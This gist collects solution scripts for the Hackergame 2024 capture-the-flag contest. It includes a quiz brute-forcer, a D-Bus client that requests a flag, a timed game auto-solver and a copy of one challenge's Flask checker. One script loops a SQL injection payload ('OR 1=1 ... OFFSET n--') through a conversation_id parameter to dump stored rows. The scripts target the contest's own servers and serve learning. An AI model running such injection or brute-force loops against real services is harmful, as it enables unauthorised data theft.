
@vifly
Last active November 12, 2024 12:03
Hackergame 2024 writeup code
import requests
# Session cookie sent with every request; the value is blank in this listing.
cookies = {"session": ""}
def crack(answer):
    """Submit the quiz form with *answer* as the value of q6.

    q1 through q5 are fixed; only q6 varies between calls. When the
    response body contains "flag{" exactly twice, the body is printed and
    the process exits; otherwise the function returns None.

    NOTE(review): the request is sent over plain HTTP, so the session
    cookie is not protected in transit, and the call has no timeout.
    """
    form = {
        "q1": "3A204",
        "q2": "2682",
        "q3": "程序员的自我修养",
        "q4": "336",
        "q5": "6e90b6",
        "q6": answer,
    }
    resp = requests.post("http://202.38.93.141:13030/", data=form, cookies=cookies)
    if resp.text.count("flag{") != 2:
        return
    print(resp.text)
    exit()
# Try every integer from 1750 through 1899 as the q6 answer. crack() ends the
# process on the first response that contains "flag{" twice.
# NOTE(review): this enumeration depends on the quiz accepting repeated
# submissions; a per-session attempt limit on the server would stop it.
for candidate in range(1750, 1900):
    print(candidate)
    crack(str(candidate))
#define _GNU_SOURCE
#include <sys/mman.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <gio/gio.h>
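/*
 * Calls GetFlag2 on cn.edu.ustc.lug.hack.FlagService over the D-Bus *system*
 * bus, passing one end of a socketpair as the method's single 'h'
 * (file-descriptor handle) argument. The request text is written to the
 * other end first, so it is already queued on the socket when the message
 * is sent.
 *
 * Returns 0 when a reply message was received and 1 on any local failure.
 */
int main() {
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) {
        perror("socketpair");
        return 1;
    }

    /* Queue the request on sv[0]; the peer end sv[1] is what gets sent. */
    static const char request[] = "Please give me flag2\n";
    const ssize_t request_len = (ssize_t)(sizeof(request) - 1);
    if (write(sv[0], request, sizeof(request) - 1) != request_len) {
        perror("write");
        close(sv[0]);
        close(sv[1]);
        return 1;
    }

    GError *error = NULL;

    // Connect to the system bus (G_BUS_TYPE_SYSTEM), not the session bus
    GDBusConnection *connection = g_bus_get_sync(G_BUS_TYPE_SYSTEM, NULL, &error);
    if (error) {
        g_printerr("Error connecting to system bus: %s\n", error->message);
        g_clear_error(&error);
        close(sv[0]);
        close(sv[1]);
        return 1;
    }

    /* The list stores its own dup() of sv[1]; our copy is closed below. */
    GUnixFDList *fd_list = g_unix_fd_list_new();
    gint fd_index = g_unix_fd_list_append(fd_list, sv[1], &error);
    if (fd_index == -1) {
        g_printerr("Error adding FD to GUnixFDList: %s\n", error->message);
        g_clear_error(&error);
        g_object_unref(fd_list);
        g_object_unref(connection);
        close(sv[0]);
        close(sv[1]);
        return 1;
    }

    /* The message body carries the index into fd_list, not the raw fd. */
    GVariant *parameters = g_variant_new("(h)", fd_index);

    // Create a D-Bus message for method invocation
    GDBusMessage *message = g_dbus_message_new_method_call(
        "cn.edu.ustc.lug.hack.FlagService",  // destination bus name
        "/cn/edu/ustc/lug/hack/FlagService", // object path
        "cn.edu.ustc.lug.hack.FlagService",  // interface name
        "GetFlag2"                           // method name
    );
    g_dbus_message_set_body(message, parameters);
    g_dbus_message_set_unix_fd_list(message, fd_list);

    // Send the message and block until the reply arrives
    int status = 0;
    GDBusMessage *response = g_dbus_connection_send_message_with_reply_sync(
        connection, message, G_DBUS_SEND_MESSAGE_FLAGS_NONE,
        -1, // timeout (use default)
        NULL, NULL, &error);
    if (response == NULL) {
        g_printerr("Error sending message: %s\n", error->message);
        g_clear_error(&error);
        status = 1;
    } else {
        /*
         * A non-NULL reply only means the exchange completed locally; an
         * error reply from the service is also delivered as a message and
         * is printed here like any other body.
         */
        g_print("Message sent successfully, response received.\n");

        // Get the response body and print it
        GVariant *response_body = g_dbus_message_get_body(response);
        if (response_body) {
            gchar *response_str = g_variant_print(response_body, TRUE);
            g_print("Response: %s\n", response_str);
            g_free(response_str);
        } else {
            g_print("No response body.\n");
        }
        g_object_unref(response);
    }

    // Cleanup: the message holds its own reference to fd_list
    g_object_unref(message);
    g_object_unref(fd_list);
    g_object_unref(connection);
    close(sv[0]);
    close(sv[1]);
    return status;
}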
import requests
import time
# Session cookie for the challenge site; the value is blank in this listing.
cookies = {"session": ""}
# One requests session shared by both calls in crack(), so cookies the server
# sets on the first response are sent again with the second request.
SESS = requests.session()
def crack():
    """Fetch one round of value pairs from /game and submit a comparison for each.

    The "values" field of the /game response is read as a list of pairs.
    Each pair contributes "<" or ">" to the answer list; a pair whose two
    members compare equal contributes nothing. The answers are posted to
    /submit after a nine-second pause and the JSON reply is printed.

    NOTE(review): the pause is presumably there to satisfy a minimum-time
    check on the server -- confirm. Only the first request passes `cookies`
    explicitly; the second relies on whatever the session itself holds.
    """
    game = SESS.post("http://202.38.93.141:12122/game", cookies=cookies, json={})
    print(game.text)
    pairs = game.json()["values"]
    print(pairs)

    answers = []
    for pair in pairs:
        left, right = pair[0], pair[1]
        if left < right:
            symbol = "<"
        elif left > right:
            symbol = ">"
        else:
            continue
        answers.append(symbol)

    time.sleep(9)
    result = SESS.post("http://202.38.93.141:12122/submit", json={"inputs": answers})
    print(result.json())
# Run a single fetch-and-submit round as soon as the script is executed.
crack()
import requests
# Session cookie for the challenge site; the value is blank in this listing.
cookies = {"session": ""}
# Shared requests session used for every request in crack().
SESS = requests.session()
# Per-user challenge host; <REPLACE_IT> is a placeholder for the assigned subdomain.
url = "https://<REPLACE_IT>.hack-challenge.lug.ustc.edu.cn:8443/view"
def crack():
    """Request /view repeatedly and append every response body to ./paolugpt.txt.

    The conversation_id parameter carries a quote-terminated value followed
    by an `OR 1=1 ORDER BY id LIMIT 1 OFFSET n--` clause, with n counting up
    from 0, one request per offset. The loop stops after the first response
    whose status is not 200; that response's body has already been appended
    to the file by then.

    NOTE(review): this can only return other rows if the server splices
    conversation_id into its SQL text. Binding the value as a query
    parameter would make the whole string a literal id that matches nothing.
    """
    offset = 0
    while True:
        payload = f"114514' OR 1=1 ORDER BY id LIMIT 1 OFFSET {offset}--"
        resp = SESS.get(url, params={"conversation_id": payload}, cookies=cookies)
        with open("./paolugpt.txt", "a") as out:
            out.write(resp.text)
        if resp.status_code != 200:
            break
        offset += 1
# Start the request loop as soon as the script is executed.
crack()
#!/usr/bin/python3
import atexit, base64, flask, itertools, os, re
def crc(input: bytes) -> int:
    """Return a 48-bit reflected CRC of *input*.

    The polynomial is spelled as a 49-character string in which 'A' stands
    for a 1 coefficient and 'a' for a 0. The register starts with all 48
    bits set and the result is XORed with the same all-ones mask, so an
    empty input yields 0.
    """
    poly, poly_degree = 'AaaaaaAaaaAAaaaaAAAAaaaAAAaAaAAAAaAAAaaAaaAaaAaaA', 48
    assert len(poly) == poly_degree + 1 and poly[0] == poly[poly_degree] == 'A'
    mask = (1 << poly_degree) - 1
    # Build the feedback constant: bit i is set when coefficient i + 1 is 'A'.
    flip = 0
    for bit in range(poly_degree):
        if poly[bit + 1] == 'A':
            flip |= 1 << bit
    digest = mask
    for byte in input:
        digest ^= byte
        # Shift out one bit at a time, folding in the polynomial on a 1 bit.
        for _ in range(8):
            low_bit = digest & 1
            digest >>= 1
            if low_bit:
                digest ^= flip
    return digest ^ mask
def hash(input: bytes) -> bytes:
    """Return the 6-byte little-endian digest of *input*.

    The digest is crc(input) pushed through the quadratic
    u2*x**2 + u1*x + u0 and reduced modulo 2**48.

    NOTE(review): this is a 48-bit non-cryptographic checksum that shadows
    the builtin hash(); it offers no collision or preimage resistance.
    """
    x = crc(input)
    u2, u1, u0 = 0xCb4EcdfD0A9F, 0xa9dec1C1b7A3, 0x60c4B0aAB4Bf
    assert (u2, u1, u0) == (223539323800223, 186774198532003, 106397893833919)
    mixed = (u2 * x * x + u1 * x + u0) & ((1 << 48) - 1)
    return mixed.to_bytes(6, 'little')
def xzrj(input: bytes) -> bytes:
    """Collapse consonant runs in *input*, matching case-insensitively.

    Each match is one consonant (any ASCII letter other than A, E, I, O, U),
    any immediate repeats of that same letter, and optionally a following
    'E' that is not itself followed by a letter. The whole match is replaced
    by the first consonant alone.
    """
    squeezer = re.compile(rb'([B-DF-HJ-NP-TV-Z])\1*(E(?![A-Z]))?', re.IGNORECASE)
    return squeezer.sub(rb'\1', input)
# At import time, split this source file into rows padded or cut to exactly
# 80 bytes. Each row is written to a file in the working directory named
# after the base85 form of hash(row), and the consonant-squeezed version of
# every row is accumulated for the GET route.
paths: list[bytes] = []
xzrj_bytes: bytes = b''
with open(__file__, 'rb') as f:
    for row in f.read().splitlines():
        # Strip trailing whitespace, then pad with spaces and cut to 80 bytes.
        row = row.rstrip().ljust(80)[:80]
        path = base64.b85encode(hash(row)) + b'.txt'
        with open(path, 'wb') as pf:
            pf.write(row)
        paths.append(path)
        xzrj_bytes += xzrj(row) + b'\r\n'
def clean():
    """Delete every per-row file recorded in `paths`, skipping ones already gone."""
    for leftover in paths:
        try:
            os.remove(leftover)
        except FileNotFoundError:
            # Rows with the same digest share one file, so a repeat is expected.
            continue
# Remove the per-row files when the interpreter exits.
atexit.register(clean)
# Blueprint that carries the GET and POST routes for /answer_a.py.
bp: flask.Blueprint = flask.Blueprint('answer_a', __name__)
@bp.get('/answer_a.py')
def get() -> flask.Response:
    """Serve the consonant-squeezed copy of this file that was built at import time."""
    body = xzrj_bytes
    return flask.Response(body, content_type='text/plain; charset=UTF-8')
@bp.post('/answer_a.py')
def post() -> flask.Response:
    """Compare the request body, line by line, with the stored rows of this file.

    Every line is checked even after a mismatch, except that a surplus
    request line ends the loop. Any mismatch yields a 400 response whose
    'wrong_hints' maps the 1-based line number to a message; a request with
    no mismatches gets the decoded contents of answer_a.txt with status 200.

    NOTE(review): the file opened for comparison is selected by hash() of
    the *submitted* line, not by the line's position, and the hints report
    the submitted line's digest, its length and the last differing byte.
    Together with the 48-bit non-cryptographic digest, these responses tell
    a client considerably more than pass/fail.
    """
    hints = {}
    submitted = flask.request.get_data().splitlines()
    numbered = enumerate(itertools.zip_longest(paths, submitted), start=1)
    for lineno, (expected_path, candidate) in numbered:
        # zip_longest pads the shorter side with None.
        if expected_path is None:
            hints[lineno] = 'Too many lines for request data'
            break
        if candidate is None:
            hints[lineno] = 'Too few lines for request data'
            continue

        candidate_hash = hash(candidate)
        candidate_path = base64.b85encode(candidate_hash) + b'.txt'
        if not os.path.exists(candidate_path):
            hints[lineno] = f'Unmatched hash ({candidate_hash.hex()})'
            continue

        with open(candidate_path, 'rb') as pf:
            stored = pf.read()
        if len(candidate) != len(stored):
            hints[lineno] = f'Unmatched length ({len(candidate)})'
            continue

        # Collect the submitted bytes that differ from the stored row.
        unmatched = [theirs for ours, theirs in zip(stored, candidate) if ours != theirs]
        if unmatched:
            hints[lineno] = f'Unmatched data (0x{unmatched[-1]:02X})'
            continue

        # Content is identical to some stored row; it must also be this row.
        if expected_path != candidate_path:
            hints[lineno] = f'Matched but in other lines'

    if hints:
        return {'wrong_hints': hints}, 400

    with open('answer_a.txt', 'rb') as af:
        answer_flag = base64.b85decode(af.read()).decode()
    closing, opening = answer_flag[-1:], answer_flag[:5]
    assert closing == '}' and opening == 'flag{'
    return {'answer_flag': answer_flag}, 200
# Rebuild a fixed-width copy of answer_a.py: every line is right-padded with
# spaces to 80 characters and written to original_answer_a.py. Lines that
# are already 80 characters or longer are copied without padding.
input_file = "./answer_a.py"
new_content = []
with open(input_file, "r") as f:
    for line in f:
        new_content.append(line.strip("\n").ljust(80) + "\n")
with open("original_answer_a.py", "w") as f:
    f.writelines(new_content)